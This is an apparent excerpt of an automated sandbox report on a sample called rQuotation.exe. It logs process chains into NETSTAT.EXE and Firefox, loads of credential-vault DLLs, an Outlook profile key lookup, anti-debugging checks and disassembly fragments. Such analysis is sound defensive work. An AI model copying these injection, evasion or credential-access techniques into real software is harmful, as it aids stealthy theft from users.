              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"Jump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rQuotation.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: snmpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: rQuotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: netstat.pdbGCTL source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572470472.0000000001107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstat.pdb source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572470472.0000000001107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gAmAZOKQyy.exe, 00000004.00000000.1946445492.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp, gAmAZOKQyy.exe, 00000006.00000000.2087665206.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: rQuotation.exe, 00000000.00000003.1931437975.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000003.1929221288.000000000132C000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.000000000182E000.00000040.00001000.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.000000000346E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2021924278.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2023759213.0000000003120000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: rQuotation.exe, rQuotation.exe, 00000000.00000003.1931437975.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000003.1929221288.000000000132C000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.000000000182E000.00000040.00001000.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.3573169632.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.000000000346E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2021924278.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2023759213.0000000003120000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00859092 push es; iretd 0_2_0085915B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008590DF push es; iretd 0_2_0085915B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084A805 push ebx; iretd 0_2_0084A80B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084D038 push ebx; iretd 0_2_0084D086
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084D053 push ebx; iretd 0_2_0084D086
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008481E7 push ecx; iretd 0_2_008481EB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00843160 push eax; ret 0_2_00843162
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084D977 push ss; iretd 0_2_0084D979
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00855A50 push edx; ret 0_2_00855A5E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00855A53 push edx; ret 0_2_00855A5E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084D270 push ds; iretd 0_2_0084D27B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008544B7 push ecx; retf 0_2_00854496
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008544D5 push ecx; retf 0_2_00854496
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00841CD8 pushad ; retf 0_2_00841CE9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00854457 push ecx; retf 0_2_00854496
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00854E52 push ebp; ret 0_2_00854E59
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008547B6 push es; retf 0_2_008547B7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0085272B push esi; ret 0_2_0085272C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0169225F pushad ; ret 0_2_016927F9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016927FA pushad ; ret 0_2_016927F9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C09AD push ecx; mov dword ptr [esp], ecx0_2_016C09B6
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0169283D push eax; iretd 0_2_01692858
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D225F pushad ; ret 5_2_032D27F9
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D27FA pushad ; ret 5_2_032D27F9
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033009AD push ecx; mov dword ptr [esp], ecx5_2_033009B6
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D283D push eax; iretd 5_2_032D2858
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D1368 push eax; iretd 5_2_032D1369
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A6A3A0 push edx; ret 5_2_02A6A3BE
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A6A379 push edx; ret 5_2_02A6A3BE
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A628ED push edx; ret 5_2_02A628FB
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A628F0 push edx; ret 5_2_02A628FB
              Source: rQuotation.exeStatic PE information: section name: .text entropy: 7.9961506950995505
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0170096E rdtsc 0_2_0170096E
              Source: C:\Users\user\Desktop\rQuotation.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 2.6 %
              Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7940Thread sleep count: 43 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7940Thread sleep time: -86000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe TID: 7956Thread sleep time: -45000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe TID: 7956Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A6CC20 FindFirstFileW,FindNextFileW,FindClose,5_2_02A6CC20
              Source: gAmAZOKQyy.exe, 00000006.00000002.3572777218.00000000010AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: firefox.exe, 00000007.00000002.2311370622.000001610E07C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
              Source: C:\Program Files\Mozilla Firefox\firefox.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\rQuotation.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\rQuotation.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0170096E rdtsc 0_2_0170096E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00857CB3 LdrLoadDll,0_2_00857CB3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794164 mov eax, dword ptr fs:[00000030h]0_2_01794164
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794164 mov eax, dword ptr fs:[00000030h]0_2_01794164
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01758158 mov eax, dword ptr fs:[00000030h]0_2_01758158
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01754144 mov eax, dword ptr fs:[00000030h]0_2_01754144
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01754144 mov eax, dword ptr fs:[00000030h]0_2_01754144
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01754144 mov ecx, dword ptr fs:[00000030h]0_2_01754144
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01754144 mov eax, dword ptr fs:[00000030h]0_2_01754144
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01754144 mov eax, dword ptr fs:[00000030h]0_2_01754144
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6154 mov eax, dword ptr fs:[00000030h]0_2_016C6154
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6154 mov eax, dword ptr fs:[00000030h]0_2_016C6154
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC156 mov eax, dword ptr fs:[00000030h]0_2_016BC156
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F0124 mov eax, dword ptr fs:[00000030h]0_2_016F0124
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01780115 mov eax, dword ptr fs:[00000030h]0_2_01780115
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176A118 mov ecx, dword ptr fs:[00000030h]0_2_0176A118
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176A118 mov eax, dword ptr fs:[00000030h]0_2_0176A118
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176A118 mov eax, dword ptr fs:[00000030h]0_2_0176A118
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176A118 mov eax, dword ptr fs:[00000030h]0_2_0176A118
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov eax, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov ecx, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov eax, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov eax, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov ecx, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov eax, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov eax, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov ecx, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov eax, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov ecx, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F01F8 mov eax, dword ptr fs:[00000030h]0_2_016F01F8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017961E5 mov eax, dword ptr fs:[00000030h]0_2_017961E5
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E1D0 mov eax, dword ptr fs:[00000030h]0_2_0173E1D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E1D0 mov eax, dword ptr fs:[00000030h]0_2_0173E1D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0173E1D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E1D0 mov eax, dword ptr fs:[00000030h]0_2_0173E1D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0173E1D0 mov eax, dword ptr fs:[00000030h]0_2_0173E1D0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017861C3 mov eax, dword ptr fs:[00000030h]0_2_017861C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017861C3 mov eax, dword ptr fs:[00000030h]0_2_017861C3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174019F mov eax, dword ptr fs:[00000030h]0_2_0174019F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174019F mov eax, dword ptr fs:[00000030h]0_2_0174019F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174019F mov eax, dword ptr fs:[00000030h]0_2_0174019F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174019F mov eax, dword ptr fs:[00000030h]0_2_0174019F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01700185 mov eax, dword ptr fs:[00000030h]0_2_01700185
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01764180 mov eax, dword ptr fs:[00000030h]0_2_01764180
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01764180 mov eax, dword ptr fs:[00000030h]0_2_01764180
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA197 mov eax, dword ptr fs:[00000030h]0_2_016BA197
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA197 mov eax, dword ptr fs:[00000030h]0_2_016BA197
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA197 mov eax, dword ptr fs:[00000030h]0_2_016BA197
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177C188 mov eax, dword ptr fs:[00000030h]0_2_0177C188
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0177C188 mov eax, dword ptr fs:[00000030h]0_2_0177C188
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016EC073 mov eax, dword ptr fs:[00000030h]0_2_016EC073
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01746050 mov eax, dword ptr fs:[00000030h]0_2_01746050
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C2050 mov eax, dword ptr fs:[00000030h]0_2_016C2050
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01756030 mov eax, dword ptr fs:[00000030h]0_2_01756030
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA020 mov eax, dword ptr fs:[00000030h]0_2_016BA020
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC020 mov eax, dword ptr fs:[00000030h]0_2_016BC020
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01744000 mov ecx, dword ptr fs:[00000030h]0_2_01744000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01762000 mov eax, dword ptr fs:[00000030h]0_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01762000 mov eax, dword ptr fs:[00000030h]0_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01762000 mov eax, dword ptr fs:[00000030h]0_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01762000 mov eax, dword ptr fs:[00000030h]0_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01762000 mov eax, dword ptr fs:[00000030h]0_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01762000 mov eax, dword ptr fs:[00000030h]0_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01762000 mov eax, dword ptr fs:[00000030h]0_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01762000 mov eax, dword ptr fs:[00000030h]0_2_01762000
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE016 mov eax, dword ptr fs:[00000030h]0_2_016DE016
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE016 mov eax, dword ptr fs:[00000030h]0_2_016DE016
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE016 mov eax, dword ptr fs:[00000030h]0_2_016DE016
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016DE016 mov eax, dword ptr fs:[00000030h]0_2_016DE016
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017020F0 mov ecx, dword ptr fs:[00000030h]0_2_017020F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C80E9 mov eax, dword ptr fs:[00000030h]0_2_016C80E9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BA0E3 mov ecx, dword ptr fs:[00000030h]0_2_016BA0E3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017460E0 mov eax, dword ptr fs:[00000030h]0_2_017460E0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC0F0 mov eax, dword ptr fs:[00000030h]0_2_016BC0F0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017420DE mov eax, dword ptr fs:[00000030h]0_2_017420DE
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017860B8 mov eax, dword ptr fs:[00000030h]0_2_017860B8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017860B8 mov ecx, dword ptr fs:[00000030h]0_2_017860B8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016B80A0 mov eax, dword ptr fs:[00000030h]0_2_016B80A0
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017580A8 mov eax, dword ptr fs:[00000030h]0_2_017580A8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C208A mov eax, dword ptr fs:[00000030h]0_2_016C208A
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176437C mov eax, dword ptr fs:[00000030h]0_2_0176437C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01768350 mov ecx, dword ptr fs:[00000030h]0_2_01768350
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174035C mov eax, dword ptr fs:[00000030h]0_2_0174035C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174035C mov eax, dword ptr fs:[00000030h]0_2_0174035C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174035C mov eax, dword ptr fs:[00000030h]0_2_0174035C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174035C mov ecx, dword ptr fs:[00000030h]0_2_0174035C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174035C mov eax, dword ptr fs:[00000030h]0_2_0174035C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0174035C mov eax, dword ptr fs:[00000030h]0_2_0174035C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0178A352 mov eax, dword ptr fs:[00000030h]0_2_0178A352
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0179634F mov eax, dword ptr fs:[00000030h]0_2_0179634F
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01742349 mov eax, dword ptr fs:[00000030h]0_2_01742349
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01798324 mov eax, dword ptr fs:[00000030h]0_2_01798324
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01798324 mov ecx, dword ptr fs:[00000030h]0_2_01798324
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01798324 mov eax, dword ptr fs:[00000030h]0_2_01798324
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01798324 mov eax, dword ptr fs:[00000030h]0_2_01798324
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA30B mov eax, dword ptr fs:[00000030h]0_2_016FA30B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA30B mov eax, dword ptr fs:[00000030h]0_2_016FA30B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016FA30B mov eax, dword ptr fs:[00000030h]0_2_016FA30B
